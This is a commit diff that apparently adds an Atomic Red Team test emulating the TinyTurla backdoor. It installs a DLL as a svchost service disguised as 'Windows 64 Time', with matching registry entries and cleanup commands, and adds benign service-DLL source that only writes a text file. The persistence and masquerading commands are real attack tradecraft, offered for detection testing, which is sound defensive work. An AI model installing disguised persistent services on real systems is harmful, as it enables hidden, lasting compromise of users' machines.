New Atomic T1543.003 Tiny Turla Backdoor Service w64time (#1756)

* Update T1543.003.yaml Atomic - T1045.003 - TinyTurla backdoor service w64time It's running Dll as service to emulate the tine turla backdoor * Create W64Time.cpp * The Dll file for T145.003 Tiny Turla * Fixed YAML syntax * add blog link to description Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2022-02-02 21:57:20 +05:30
parent 98c5936be2
commit f9c2a9b69e
3 changed files with 127 additions and 0 deletions
@@ -91,3 +91,32 @@ atomic_tests:
      Stop-Service -Name "#{service_name}" 2>&1 | Out-Null
      try {(Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()}
      catch {}
+- name: TinyTurla backdoor service w64time
+  description: |
+    It's running Dll as service to emulate the tine turla backdoor
+    
+    [Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
+  supported_platforms:
+  - windows
+  input_arguments:
+    dllfilename:
+      description: It specifies Dll file to run as service
+      type: string
+      default: $PathToAtomicsFolder\T1543.003\bin\w64time.dll
+  executor:
+    command: |-
+      copy #{dllfilename} %systemroot%\system32\
+      sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
+      sc config W64Time DisplayName= "Windows 64 Time"
+      sc description W64Time "Maintain date and time synch on all clients and services in the network"
+      reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
+      reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
+      sc start W64Time
+    cleanup_command: |-
+      sc stop W64Time
+      sc.exe delete W64Time
+      del %systemroot%\system32\w64time.dll
+      reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
+      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f
+    name: command_prompt
+    elevation_required: true
@@ -0,0 +1,98 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "pch.h"
+#include <fstream>
+#include <iostream>
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+                     )
+{
+    switch (ul_reason_for_call)
+    {
+    case DLL_PROCESS_ATTACH:
+    case DLL_THREAD_ATTACH:
+    case DLL_THREAD_DETACH:
+    case DLL_PROCESS_DETACH:
+        break;
+    }
+    return TRUE;
+}
+
+SERVICE_STATUS_HANDLE SvcStatusH;
+
+//Initialize Service_Status Structure serviceType and CurrentState values
+SERVICE_STATUS SvcStatusS =
+{
+    //dwServiceType
+    SERVICE_WIN32_SHARE_PROCESS,
+    //dwCurrentState
+    SERVICE_START_PENDING,
+    //dwControlsAccepted
+    SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN | SERVICE_ACCEPT_PAUSE_CONTINUE
+};
+
+
+DWORD WINAPI SvcCtrlHandler(
+    DWORD dwControl,
+    DWORD dwEventType,
+    LPVOID lpEventData,
+    LPVOID lpContext
+)
+{
+    // Handle the requested control code. 
+
+    switch (dwControl)
+    {
+    case SERVICE_CONTROL_STOP: //Notifies Service it should stop. Should only return "NO_ERROR". Same action as Service Control Shutdown
+    case SERVICE_CONTROL_SHUTDOWN: //Notifies a service that the system is shutting down so the service can perform cleanup tasks.
+        //Manually set state to "SERVICE_STOPPED" After cleanup commands are run (none in this case)
+        SvcStatusS.dwCurrentState = SERVICE_STOPPED;
+        break;
+    case SERVICE_CONTROL_PAUSE: //Notifies a service that it should pause. 
+        SvcStatusS.dwCurrentState = SERVICE_PAUSED;
+        break;
+    case SERVICE_CONTROL_CONTINUE://Notifies a service that it should Continue after pause.
+        SvcStatusS.dwCurrentState = SERVICE_RUNNING;
+        break;
+    case SERVICE_CONTROL_INTERROGATE:
+        break;
+    default:
+        break;
+    };
+
+    SetServiceStatus(SvcStatusH, &SvcStatusS);
+
+    return NO_ERROR;
+}
+
+VOID main_payload() {
+    using namespace std;
+    ofstream myfile;
+    myfile.open("C:\\ART_W64Time.txt");
+    myfile << "Hello from the Atomic Red Team.\n";
+    myfile.close();
+    return;
+}
+
+extern "C" __declspec(dllexport) VOID WINAPI ServiceMain(DWORD dwArgc, LPCWSTR * lpszArgv)
+{
+
+    SvcStatusH = RegisterServiceCtrlHandlerEx(
+        L"W64Time",
+        SvcCtrlHandler,
+        nullptr
+    );
+
+    if (!SvcStatusH)
+    {
+        return;
+    }
+    // Report initial status to the SCM
+
+    SvcStatusS.dwCurrentState = SERVICE_RUNNING;
+
+    SetServiceStatus(SvcStatusH, &SvcStatusS);
+    main_payload();
+
+}